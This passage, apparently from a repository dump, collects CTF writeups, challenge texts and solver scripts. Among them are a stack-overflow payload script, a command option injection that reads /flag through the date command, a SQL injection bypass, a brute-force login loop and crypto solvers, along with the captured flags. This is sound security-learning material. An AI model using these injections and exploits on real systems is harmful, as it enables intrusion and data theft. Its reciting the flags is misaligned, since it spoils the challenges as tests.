flag{inspect_me_like_123} -->\n" }, { "alpha_fraction": 0.5245901346206665, "alphanum_fraction": 0.5475409626960754, "avg_line_length": 22.5, "blob_id": "b99de80609cd012f8e58bf3097ed456967517bcc", "content_id": "90bad975c5c22829a176844872adabbc04201a59", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 658, "license_type": "no_license", "max_line_length": 54, "num_lines": 26, "path": "/2021/angstromCTF_2021/Follow_the_Currents/writeup.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "# Writeup\n\n`os.urandom(2)`さえ分かれば復号化できるので、総当たりで調べる。\n\n```py\nimport os\nimport zlib\ndef keystream(key):\n index = 0\n while 1:\n index+=1\n if index >= len(key):\n key += zlib.crc32(key).to_bytes(4,'big')\n yield key[index]\nwith open(os.path.dirname(__file__)+\"/enc\",\"rb\") as f:\n cipher = f.read()\n for n in range(256*256):\n plaintext = []\n k = keystream(n.to_bytes(2,'big'))\n for i in cipher:\n plaintext.append(i ^ next(k))\n if b'actf{' in bytes(plaintext) :\n print(bytes(plaintext))\n```\n\n<!-- actf{low_entropy_keystream} -->" }, { "alpha_fraction": 0.4588235318660736, "alphanum_fraction": 0.6470588445663452, "avg_line_length": 18.615385055541992, "blob_id": "e3bfb13afa50f6f9d845d71d23ec934da149039a", "content_id": "64efac1cb13057b2909cfdd754ad83e0c85874f0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 301, "license_type": "no_license", "max_line_length": 59, "num_lines": 13, "path": "/2021/BCACTF_2.0/Agent_Gerald/writeup.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "# Writeup\n\nhttp://web.bcactf.com:49156/ にアクセスする。\n\n![](img/2021-06-13-14-42-14.png)\n\n`You're not Agent Gerald`と書かれているので、User Agent を Gerald にする。\n\n![](img/2021-06-13-14-46-36.png)\n\n![](img/2021-06-13-14-46-51.png)\n\n<!-- bcactf{y0u_h@ck3d_5tegos@urus_1nt3lligence} -->\n" }, { "alpha_fraction": 0.7478991746902466, "alphanum_fraction": 0.8095238208770752, "avg_line_length": 70.4000015258789, "blob_id": "3a7ae4601f35fab07e644b352f584d60b88554f6", "content_id": "1d2c4c61a4e14b60ee07d92780177d9702914730", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 357, "license_type": "no_license", "max_line_length": 218, "num_lines": 5, "path": "/2021/DawgCTF_2021/Its_Not_RSA/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "Our team intercepted this suspicious JSON file, but the keys don't seem quite right. We suspect this file contains critical data. Due to transmission loss, the format may need to be corrected slightly for our database.\n\nAuthor: treap_treap\n\n[intercepted_code.json](https://umbccd.io/files/a16b26a23587f82dea241f6a1927710f/intercepted_code.json?token=eyJ1c2VyX2lkIjoxMjg1LCJ0ZWFtX2lkIjo3MzgsImZpbGVfaWQiOjI4fQ.YJassg.sGrCyx9JMBxZKoQtK_YtjKXpTP4)\n" }, { "alpha_fraction": 0.7747035622596741, "alphanum_fraction": 0.8379446864128113, "avg_line_length": 27.11111068725586, "blob_id": "231b6ea05aac630001714b38ce2cc1058dd035f8", "content_id": "84dbadb20e9487b534276e6fdf1a33f93f32a836", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 431, "license_type": "no_license", "max_line_length": 97, "num_lines": 9, "path": "/2021/WaniCTF21-spring/timer/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "フラグが出てくるまで待てますか?\n\n`super_complex_flag_print_function` 関数でフラグを表示しているようですが、難読化されているため静的解析でフラグを特定するのは難しそうです...\n\nGDBを使って動的解析してみるのはいかがでしょうか?\n\n[rev-timer.zip](https://score.wanictf.org/storage/1wznoqx3t0n2bx8cz611y6vcah2v2y48/rev-timer.zip)\n\nWriter : hi120ki\n" }, { "alpha_fraction": 0.6269841194152832, "alphanum_fraction": 0.7857142686843872, "avg_line_length": 41, "blob_id": "0f42aa9a0985e5aafbdb9a4fe8ce7946dbb44f3e", "content_id": "4f7a4d4abf69ab5b0ede4e25291e41dc8a28f138", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 126, "license_type": "no_license", "max_line_length": 95, "num_lines": 3, "path": "/2021/dCTF_2021/Hidden_message/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "This image looks familiar...\n\n[fri.png](https://dctf.dragonsec.si/files/cc93248465199ed5dc9141d2fb0b9ee3/fri.png?token=eyJ1c2VyX2lkIjo4OTQsInRlYW1faWQiOjM2NiwiZmlsZV9pZCI6MTY0fQ.YJ9OZA.0DjRNUYQS4c5vCPgmCOXLAELpjQ)\n" }, { "alpha_fraction": 0.6366874575614929, "alphanum_fraction": 0.6812110543251038, "avg_line_length": 31.114286422729492, "blob_id": "ec201b072d79e70f8c3a7102fb396268578e9983", "content_id": "dd81fa86162d5827a5af5ccd54956fe869d95f62", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1645, "license_type": "no_license", "max_line_length": 142, "num_lines": 35, "path": "/2020/Harekaze_mini_CTF_2020/What_time_is_it_now/writeup.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "# Writeup\n\n指定のサイトにアクセスすると、現在時刻が表示される。\n\n![](img/2020-12-26-15-25-49.png)\n\nソースコードを読むと、どうやら`date`コマンドを実行して、その結果を表示しているようだ。`date`の出力フォーマットを`format`パラメータで指定している。\n\n```php\n<?php\nif (isset($_GET['source'])) {\n highlight_file(__FILE__);\n exit;\n}\n\n$format = isset($_REQUEST['format']) ? (string)$_REQUEST['format'] : '%H:%M:%S';\n$result = shell_exec(\"date '+\" . escapeshellcmd($format) . \"' 2>&1\");\n?>\n\n// (略)\n\n<h1 class=\"jumbotron-heading\"><span class=\"text-muted\">It's</span> <?= isset($result) ? $result : '?' ?><span class=\"text-muted\">.</span></h1>\n```\n\n`format`に実行したいコマンドを入れ、`date '+`.`%Y-%m-%d' ; ls '`.`'`みたいにすれば良さそうだが、`escapeshellcmd`によってほとんどの特殊文字がエスケープされてしまうので不可能。(ただし、対になっている`'`,`\"`は可能)\n\n* [PHPマニュアル:escapeshellcmd:シェルのメタ文字をエスケープする](https://php.plus-server.net/function.escapeshellcmd.html)\n\n[GTFOBins](https://gtfobins.github.io/)で`date`コマンドについて調べると、`-f`オプションでファイル読み込みができることが分かった。\n\nファイル名は決め打ちで、`format`に`' -f /flag'`を与えたところ、`date '+' -f /flag'' 2>&1`が実行され、フラグが表示された。\n\n* http://harekaze2020.317de643c0ae425482fd.japaneast.aksapp.io/what-time-is-it-now/?format=%27%20-f%20/flag%27\n\n<!-- HarekazeCTF{1t's_7pm_1n_t0ky0} -->" }, { "alpha_fraction": 0.5515463948249817, "alphanum_fraction": 0.6005154848098755, "avg_line_length": 18.450000762939453, "blob_id": "47fd9e7ef9dc57c1763a787df5a536e93c4f1232", "content_id": "3b9659153f56181ac327fcbd02445e4d959585a5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 390, "license_type": "no_license", "max_line_length": 43, "num_lines": 20, "path": "/2020/WaniCTF/l0g0n/solver.py", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "from pwn import *\n\nconn = remote('l0g0n.wanictf.org',50002)\n\ncnt = 0\nwhile True:\n cnt += 1\n # client_challenge -> server_credential\n conn.sendline('00') # any 1byte\n conn.recvuntil('>')\n # client_credential\n conn.sendline('50') # any 1byte\n conn.recvuntil('>')\n\n msg = str(conn.recvline())\n print(cnt,msg)\n if 'OK' in msg: # 1/256\n break\n\nconn.close()" }, { "alpha_fraction": 0.5188679099082947, "alphanum_fraction": 0.5377358198165894, "avg_line_length": 19.190475463867188, "blob_id": "681a35c1c1d493c0c3bcab37be1e24a111c20273", "content_id": "2f7bb6f9ef15b1af28698e28fc8f3a9cab85939b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 430, "license_type": "no_license", "max_line_length": 44, "num_lines": 21, "path": "/2021/WaniCTF21-spring/Cant_restore_the_flag/cry-cant-restore-the-flag/server.py", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "from Crypto.Util.number import bytes_to_long\n\nwith open(\"flag.txt\", \"rb\") as f:\n flag = f.read()\nflag = bytes_to_long(flag)\n\nassert flag <= 10 ** 103\n\nupper_bound = 300\nwhile True:\n try:\n mod = int(input(\"Mod > \"))\n if mod > upper_bound:\n print(\"Don't cheat 🤪\")\n continue\n\n result = flag % mod\n print(result)\n except Exception:\n print(\"Bye 👋\")\n break\n" }, { "alpha_fraction": 0.5160028338432312, "alphanum_fraction": 0.6443812251091003, "avg_line_length": 56.408164978027344, "blob_id": "c2db16df40a060d4d7e97555ec27bf42a8db4874", "content_id": "d67cfa444db40e4388ea1b3ce4a394f8c9d9992a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 3638, "license_type": "no_license", "max_line_length": 1667, "num_lines": 49, "path": "/2020/SunshineCTF/Magically_Delicious/writeup.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "# Writeup\n\n```\n⭐🌈🍀 ⭐🌈🦄 ⭐🦄🌈 ⭐🎈🍀 ⭐🦄🌑 ⭐🌈🦄 ⭐🌑🍀 ⭐🦄🍀 ⭐🎈⭐ 🦄🦄 ⭐🦄🎈 ⭐🌑🍀 ⭐🌈🌑 ⭐🌑⭐ ⭐🦄🌑 🦄🦄 ⭐🌑🦄 ⭐🦄🌈 ⭐🌑🍀 ⭐🦄🎈 ⭐🌑🌑 ⭐🦄⭐ ⭐🦄🌈 ⭐🌑🎈 🦄🦄 ⭐🦄⭐ ⭐🌈🍀 🦄🦄 ⭐🌈🌑 ⭐🦄💜 ⭐🌑🦄 🦄🦄 ⭐🌑🐴 ⭐🌑🦄 ⭐🌈🍀 ⭐🌈🌑 🦄🦄 ⭐🌑🦄 ⭐🦄🌈 ⭐🌑🍀 ⭐🦄🎈 ⭐🌑🌑 ⭐🦄⭐ ⭐🦄🌈 ⭐🌑🎈 🦄🦄 ⭐🦄🦄 ⭐🌑🦄 ⭐🌈🌑 ⭐🦄💜 ⭐🦄🎈 ⭐🌑🌑 ⭐🎈🦄\n```\n\n対象の文字列を見てみると、3つ区切りで8種の文字が使われていることが分かった。\n\nということは8進数が関連していそうだと推測。\n\n試しにフラグ形式の`sun{}`を8進数に変換してみると\n\n`163 165 156 173 175` となる。\n\n* https://gchq.github.io/CyberChef/#recipe=To_Octal('Space')&input=c3Vue30\n\n絵文字と比べてみると、以下の対応があることが分かった。\n\n| number | emoji |\n| ------ | ----- |\n| 0 | |\n| 1 | ⭐ |\n| 2 | |\n| 3 | 🍀 |\n| 4 | |\n| 5 | 🦄 |\n| 6 | 🌈 |\n| 7 | 🎈 |\n\n```\n163 165 156 173 15🌑 165 1🌑3 153 171 55 157 1🌑3 16🌑 1🌑1 15🌑 55 1🌑5 156 1🌑3 157 1🌑🌑 151 156 1🌑7 55 151 163 55 16🌑 15💜 1🌑5 55 1🌑🐴 1🌑5 163 16🌑 55 1🌑5 156 1🌑3 157 1🌑🌑 151 156 1🌑7 55 155 1🌑5 16🌑 15💜 157 1🌑🌑 175\n```\n\n残りは総当たりで絞り込んでいく。結果、下のように対応付けると綺麗に英単語が現れる。\n\n| number | emoji |\n| ------ | ----- |\n| 0 | 💜 |\n| 1 | ⭐ |\n| 2 | 🐴 |\n| 3 | 🍀 |\n| 4 | 🌑 |\n| 5 | 🦄 |\n| 6 | 🌈 |\n| 7 | 🎈 |\n\n* [CyberChef-Recipe](https://gchq.github.io/CyberChef/#recipe=Find_/_Replace(%7B'option':'Regex','string':'%F0%9F%92%9C'%7D,'0',true,false,true,false)Find_/_Replace(%7B'option':'Regex','string':'%E2%AD%90'%7D,'1',true,true,true,false)Find_/_Replace(%7B'option':'Regex','string':'%F0%9F%90%B4'%7D,'2',true,false,true,false)Find_/_Replace(%7B'option':'Regex','string':'%F0%9F%8D%80'%7D,'3',true,false,true,false)Find_/_Replace(%7B'option':'Regex','string':'%F0%9F%8C%91'%7D,'4',true,false,true,false)Find_/_Replace(%7B'option':'Regex','string':'%F0%9F%A6%84'%7D,'5',true,false,true,false)Find_/_Replace(%7B'option':'Regex','string':'%F0%9F%8C%88'%7D,'6',true,false,true,false)Find_/_Replace(%7B'option':'Regex','string':'%F0%9F%8E%88'%7D,'7',true,false,true,false)From_Octal('Space')&input=4q2Q8J%2BMiPCfjYAg4q2Q8J%2BMiPCfpoQg4q2Q8J%2BmhPCfjIgg4q2Q8J%2BOiPCfjYAg4q2Q8J%2BmhPCfjJEg4q2Q8J%2BMiPCfpoQg4q2Q8J%2BMkfCfjYAg4q2Q8J%2BmhPCfjYAg4q2Q8J%2BOiOKtkCDwn6aE8J%2BmhCDirZDwn6aE8J%2BOiCDirZDwn4yR8J%2BNgCDirZDwn4yI8J%2BMkSDirZDwn4yR4q2QIOKtkPCfpoTwn4yRIPCfpoTwn6aEIOKtkPCfjJHwn6aEIOKtkPCfpoTwn4yIIOKtkPCfjJHwn42AIOKtkPCfpoTwn46IIOKtkPCfjJHwn4yRIOKtkPCfpoTirZAg4q2Q8J%2BmhPCfjIgg4q2Q8J%2BMkfCfjogg8J%2BmhPCfpoQg4q2Q8J%2BmhOKtkCDirZDwn4yI8J%2BNgCDwn6aE8J%2BmhCDirZDwn4yI8J%2BMkSDirZDwn6aE8J%2BSnCDirZDwn4yR8J%2BmhCDwn6aE8J%2BmhCDirZDwn4yR8J%2BQtCDirZDwn4yR8J%2BmhCDirZDwn4yI8J%2BNgCDirZDwn4yI8J%2BMkSDwn6aE8J%2BmhCDirZDwn4yR8J%2BmhCDirZDwn6aE8J%2BMiCDirZDwn4yR8J%2BNgCDirZDwn6aE8J%2BOiCDirZDwn4yR8J%2BMkSDirZDwn6aE4q2QIOKtkPCfpoTwn4yIIOKtkPCfjJHwn46IIPCfpoTwn6aEIOKtkPCfpoTwn6aEIOKtkPCfjJHwn6aEIOKtkPCfjIjwn4yRIOKtkPCfpoTwn5KcIOKtkPCfpoTwn46IIOKtkPCfjJHwn4yRIOKtkPCfjojwn6aE)\n\n<!-- sun{lucky-octal-encoding-is-the-best-encoding-method} -->" }, { "alpha_fraction": 0.7680412530899048, "alphanum_fraction": 0.8298969268798828, "avg_line_length": 20.66666603088379, "blob_id": "bc812ab0755cf2f4069c4605662535b665f73993", "content_id": "be8d7c9b28be1a163dd353bd748e4087cf27084e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 280, "license_type": "no_license", "max_line_length": 89, "num_lines": 9, "path": "/2020/WaniCTF/Find_a_Number/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "隠された数字を当てるとフラグが表示されます.\n\n数字は0以上500000以下であることが保証されています.\n\n`nc number.wanictf.org 60000`\n\n[number.py](https://score.wanictf.org/storage/vtealojurvdthppkuvwatojhkmloxdbo/number.py)\n\nWriter : kawamoto" }, { "alpha_fraction": 0.5479452013969421, "alphanum_fraction": 0.664383590221405, "avg_line_length": 13.600000381469727, "blob_id": "8266a9d14ae81cc6a56f1b747bb5744e24e9848a", "content_id": "d1618f09b684ec2048c061419cf17c0a161d0ea2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 186, "license_type": "no_license", "max_line_length": 44, "num_lines": 10, "path": "/2021/redpwnCTF_2021/compliant-lattice-feline/writeup.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "# Writeup\n\nncコマンドを実行するとフラグが返ってくる。\n\n```bash\n$ nc mc.ax 31443\nflag{n3tc4t_1s_a_pip3_t0_the_w0rld}\n```\n\n<!-- flag{n3tc4t_1s_a_pip3_t0_the_w0rld} -->\n" }, { "alpha_fraction": 0.7531914710998535, "alphanum_fraction": 0.7765957713127136, "avg_line_length": 35.230770111083984, "blob_id": "982ddb4291b2304dfcf79f65a9d053527879b072", "content_id": "1ff96714d2bd624ddcadbf79c5b2476e985c571b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 470, "license_type": "no_license", "max_line_length": 214, "num_lines": 13, "path": "/2021/BCACTF_2.0/Movie-Login-3/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "I think the final addition to the Gerard series is coming out! I heard the last few movies got their poster leaked. I'm pretty sure they've increased their security, though. Could you help me find the poster again?\n\n[denylist.json](https://objects.bcactf.com/bcactf2/movie-login-3/denylist.json)\n\nhttp://web.bcactf.com:49162/\n\nHint 1 of 2\n\nDoes there seem to be anything different about this problem?\n\nHint 2 of 2\n\nHow can you get around the new keywords being detected?" }, { "alpha_fraction": 0.5757575631141663, "alphanum_fraction": 0.6818181872367859, "avg_line_length": 18, "blob_id": "6738330e895dbfd835adcba7cfc322e0e99c216f", "content_id": "d5c018c9efb3ab16e9fd045aa9bf1df548a021e2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 182, "license_type": "no_license", "max_line_length": 47, "num_lines": 7, "path": "/2020/WaniCTF/DevTools_2/writeup.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "# Writeup\n\n直接HTMLのテキストを変更すると、フラグが`alert()`で表示される。\n\n![](img/2020-11-22-13-48-58.png)\n\n<!-- FLAG{you_can_edit_html_using_devtools} -->" }, { "alpha_fraction": 0.7520325183868408, "alphanum_fraction": 0.7682926654815674, "avg_line_length": 48.400001525878906, "blob_id": "87763a48290b3bfcfbd34e5c3f8632965a263161", "content_id": "57e3ac3ad8d953353e957d4dc0ab7e53b0032ffe", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 246, "license_type": "no_license", "max_line_length": 184, "num_lines": 5, "path": "/2020/SunshineCTF/Password_Pandemonium/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "You're looking to book a flight to Florida with the totally-legit new budget airline, Oceanic Airlines! All you need to do is create an account! Should be pretty easy, right? ...right?\n\nhttp://pandemonium.web.2020.sunshinectf.org\n\nAuthor: Jeffrey D." }, { "alpha_fraction": 0.7609890103340149, "alphanum_fraction": 0.8104395866394043, "avg_line_length": 120.66666412353516, "blob_id": "853348828726cf3a44a0433f55da2c180e0549d0", "content_id": "b712a85e660cc06750fcb5aa566d44ebfa41164a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 368, "license_type": "no_license", "max_line_length": 268, "num_lines": 3, "path": "/2021/justCTF_2020/PDF_is_broken_and_so_is_this_file/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "This PDF contains the flag, but you’ll probably need to fix it first to figure out how it’s embedded. Fortunately, the file contains everything you need to render it. Follow the clues to find the flag, and hopefully learn something about the PDF format in the process.\n\nhttps://ams3.digitaloceanspaces.com/justctf/eccb3bff-69aa-4232-8087-a5e8eea0f581/challenge.pdf" }, { "alpha_fraction": 0.6720647811889648, "alphanum_fraction": 0.6983805894851685, "avg_line_length": 22.571428298950195, "blob_id": "5a4b5ed5740ff83d48366e83d0b8133261eabebd", "content_id": "b82c99705989e924223725c6a630ec1163081cad", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 784, "license_type": "no_license", "max_line_length": 93, "num_lines": 21, "path": "/2020/WaniCTF/SQL_Challenge_2/writeup.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "# Writeup\n\nSQLインジェクションをしてフラグを入手する。ただし、使えるクエリ文字列には制限がある。特殊記号の前に`\\`が付与される。\n\n```php\n//preg_replaceで危険な記号を処理する。\n$pattern = '/([^a-zA-Z0-9])/';\n$replace = '\\\\\\$0';\n$year = preg_replace($pattern, $replace, $year);\n\n//クエリを作成する。\n$query = \"SELECT * FROM anime WHERE years = $year\";\n```\n\nクエリパラメータに`years`を与える。すると、`SELECT * FROM anime WHERE years = years`が実行されてすべての`anime`カラムが取得できる。\n\n* https://sql2.wanictf.org/index.php?year=years\n\n<!-- FLAG{5ql_ch4r_cf_ca87b27723} -->\n\n(特殊文字を使うという固定観念に縛られて、思いのほか結構悩んだ。)" }, { "alpha_fraction": 0.7293233275413513, "alphanum_fraction": 0.7481203079223633, "avg_line_length": 19.461538314819336, "blob_id": "118c12ca8ba9603c072d14370538223f077e880d", "content_id": "a0145b5fcaccc7dfdc77abf170ee320ed0c9c892", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 266, "license_type": "no_license", "max_line_length": 69, "num_lines": 13, "path": "/2021/BCACTF_2.0/􃗁􌲔􇺟􊸉􁫞􄺷􄧻􃄏􊸉/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "Here's some enciphered text. Find the flag.\n\nNote: The flag is all-lowercase.\n\n[ciphertext.md](https://objects.bcactf.com/bcactf2/pua/ciphertext.md)\n\nHint 1 of 2\n\nThe characters are all the same... or are they?\n\nHint 2 of 2\n\nHow many different characters are there?\n" }, { "alpha_fraction": 0.5625, "alphanum_fraction": 0.7013888955116272, "avg_line_length": 17, "blob_id": "58476307ba2a21360ecde5f8d7b45fbbe9aaded7", "content_id": "617cda33037904d5dc44538f310abe66ef154c54", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 144, "license_type": "no_license", "max_line_length": 45, "num_lines": 8, "path": "/2021/ImaginaryCTF_2021/stackoverflow/solver.py", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "from pwn import *\n\nio = remote('chal.imaginaryctf.org', '42001')\n\npayload = p32(0x69637466)\n\nio.sendline(b'\\x00'*40 + payload)\nio.interactive()\n" }, { "alpha_fraction": 0.36090224981307983, "alphanum_fraction": 0.6060150265693665, "avg_line_length": 30.66666603088379, "blob_id": "db58ef66cb9b022623dc2c94ee23561b8ae99f3d", "content_id": "957b45311e58a656805c624bad3de53893dd4d4f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 665, "license_type": "no_license", "max_line_length": 246, "num_lines": 21, "path": "/2021/RaRCTF_2021/verybabyrev/solver.py", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "from Crypto.Util.number import *\nimport string\n\nCHARS = string.printable\n\nlocals = [0x45481d1217111313, 0x95f422c260b4145, 0x541b56563d6c5f0b, 0x585c0b3c2945415f, 0x402a6c54095d5f00, 0x4b5f4248276a0606, 0x6c5e5d432c2d4256, 0x6b315e434707412d, 0x5e54491c6e3b0a5a, 0x2828475e05342b1a, 0x60450073b26111f, 0xa774803050b0d04]\nlocals = [ long_to_bytes(l)[::-1] for l in locals]\n\nflag = 'r'\nidx = 0\n\nfor local in locals:\n for l in local:\n for c in CHARS:\n if ord(flag[idx]) ^ ord(c) == l:\n flag += c\n idx += 1\n if c == '}':\n print(flag)\n exit(0)\n break\n" }, { "alpha_fraction": 0.699999988079071, "alphanum_fraction": 0.7090908885002136, "avg_line_length": 36, "blob_id": "4d12fcf2ba270fe9a78730d97fa57e5b2e4edad9", "content_id": "b46b868536109ed0cc80b7a5e9bb4034b702251f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 110, "license_type": "no_license", "max_line_length": 91, "num_lines": 3, "path": "/2021/UIUCTF_2021/wasmbaby/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "wasm's a cool new technology! [http://wasmbaby.chal.uiuc.tf](http://wasmbaby.chal.uiuc.tf/)\n\n**author**: ian5v" }, { "alpha_fraction": 0.313554972410202, "alphanum_fraction": 0.6429667472839355, "avg_line_length": 50.44736862182617, "blob_id": "88c34d362747741fbfaad30288867556e552aa07", "content_id": "341054f68ff0d6d27ca3c46105f5884b15ef7ae6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1955, "license_type": "no_license", "max_line_length": 621, "num_lines": 38, "path": "/2021/PlaidCTF_2021/xorsa/solver.py", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "import os\nfrom Crypto.PublicKey import RSA\nfrom Crypto.Util.number import *\nfrom Crypto.Cipher import PKCS1_OAEP\n\npubKey = RSA.import_key(open(os.path.dirname(__file__) + \"/dist/public.pem\").read())\ne = pubKey.e\nn = pubKey.n\nx = 16158503035655503426113161923582139215996816729841729510388257123879913978158886398099119284865182008994209960822918533986492024494600106348146394391522057566608094710459034761239411826561975763233251722937911293380163746384471886598967490683174505277425790076708816190844068727460135370229854070720638780344789626637927699732624476246512446229279134683464388038627051524453190148083707025054101132463059634405171130015990728153311556498299145863647112326468089494225289395728401221863674961839497514512905495012562702779156196970731085339939466059770413224786385677222902726546438487688076765303358036256878804074494\n\nprimes = [[0,0]]\nbit = 1\nwhile bit <= 2**4096:\n next_primes = []\n for ps in primes:\n [p, q] = ps\n if p > q and [q, p] in primes:\n continue\n bit_mask = (bit << 1) - 1\n if (x & bit) == 0: # XOR : 0\n if ((p * q) & bit_mask) == (n & bit_mask) and p * q <= n: # 0,0\n next_primes.append([p, q])\n if ((p | bit) * (q | bit) & bit_mask) == (n & bit_mask) and (p | bit) * (q | bit) <= n: # 1,1\n next_primes.append([(p | bit), (q | bit)])\n else: # XOR : 1\n if (p * (q | bit) & bit_mask) == (n & bit_mask) and p * (q | bit) <= n: # 0,1\n next_primes.append([p, (q | bit)])\n if ((p | bit) * q & bit_mask) == (n & bit_mask) and (p | bit) * q <= n: # 1,0\n next_primes.append([(p | bit), q]) \n primes = next_primes\n bit <<= 1\n\nfor prime in primes:\n [p, q] = prime\n d = pow(e, -1, (p-1)*(q-1))\n key = RSA.construct((n,e,d,p,q))\n cipher = PKCS1_OAEP.new(key)\n print(cipher.decrypt(open(os.path.dirname(__file__) + \"/dist/flag.enc\", \"rb\").read()))\n" }, { "alpha_fraction": 0.625, "alphanum_fraction": 0.8146551847457886, "avg_line_length": 32.14285659790039, "blob_id": "a7eb04da0cc25f460b6bfc10db2ff1a0ce6f6e2f", "content_id": "64b158bb7cdfc203cd8576369e1a8e895ec3806f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 234, "license_type": "no_license", "max_line_length": 119, "num_lines": 7, "path": "/2021/redpwnCTF_2021/secure/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "Just learned about encryption—now, my website is unhackable!\n\n[secure.mc.ax](https://secure.mc.ax/)\n\nDownloads\n\n[index.js](https://static.redpwn.net/uploads/210a9fe526e420576e4b6c1cb74eeed437c1a89955c8158c14aa365c45578200/index.js)\n" }, { "alpha_fraction": 0.6733668446540833, "alphanum_fraction": 0.7839195728302002, "avg_line_length": 38.79999923706055, "blob_id": "5ebf83227d29124b1e65fffc9a890c388adf4d65", "content_id": "42a543b123a404ff386ac191987e232187c2cd24", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 199, "license_type": "no_license", "max_line_length": 101, "num_lines": 5, "path": "/2021/DawgCTF_2021/Secret_App/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "I hid my flag in a secret app but I forgot what my username and password are.\n\nAuthor: Percival\n\n[secret_app.exe](https://umbccd.io/files/c2d007acae2a65263188375ae518422a/secret_app.exe?token=eyJ1c2VyX2lkIjoxMjg1LCJ0ZWFtX2lkIjo3MzgsImZpbGVfaWQiOjIyfQ.YJZJJQ.Q9G_MqlaRvpI6N4jdrZgRi7ye74)\n" }, { "alpha_fraction": 0.2586418092250824, "alphanum_fraction": 0.3037509322166443, "avg_line_length": 14.163568496704102, "blob_id": "4eeb9a226c2d55f135ba0d60516287518edea751", "content_id": "1f9834703d9097cfeefb31de8da34858af853631", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 4269, "license_type": "no_license", "max_line_length": 383, "num_lines": 269, "path": "/2021/RaRCTF_2021/Dotty/writeup.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "# Writeup\n\nexeファイルが与えられる。dnSpyでデコンパイルしたところ、次のようなコードが実行されていることが分かった。\n\n```cs\nusing System;\nusing System.Collections.Generic;\nusing System.Linq;\n\nnamespace Dotty\n{\n\t// Token: 0x02000002 RID: 2\n\tinternal class Program\n\t{\n\t\t// Token: 0x06000002 RID: 2 RVA: 0x00002058 File Offset: 0x00000258\n\t\tprivate static string Dotter(string phrase)\n\t\t{\n\t\t\treturn string.Join(\"|\", from char c in phrase\n\t\t\tselect Program.mapper[char.ToUpper(c)]);\n\t\t}\n\n\t\t// Token: 0x06000003 RID: 3 RVA: 0x0000208C File Offset: 0x0000028C\n\t\tprivate static void Main(string[] args)\n\t\t{\n\t\t\tConsole.Write(\"Please enter your secret to encode: \");\n\t\t\tstring phrase = Console.ReadLine();\n\t\t\tstring text = Program.Dotter(phrase);\n\t\t\tif (text == Check.check)\n\t\t\t{\n\t\t\t\tConsole.WriteLine(\"That's the right secret!\");\n\t\t\t}\n\t\t\telse\n\t\t\t{\n\t\t\t\tConsole.WriteLine(text);\n\t\t\t}\n\t\t}\n\n\t\t// Token: 0x04000001 RID: 1\n\t\tprivate static Dictionary<char, string> mapper = new Dictionary<char, string>\n\t\t{\n\t\t\t{\n\t\t\t\t' 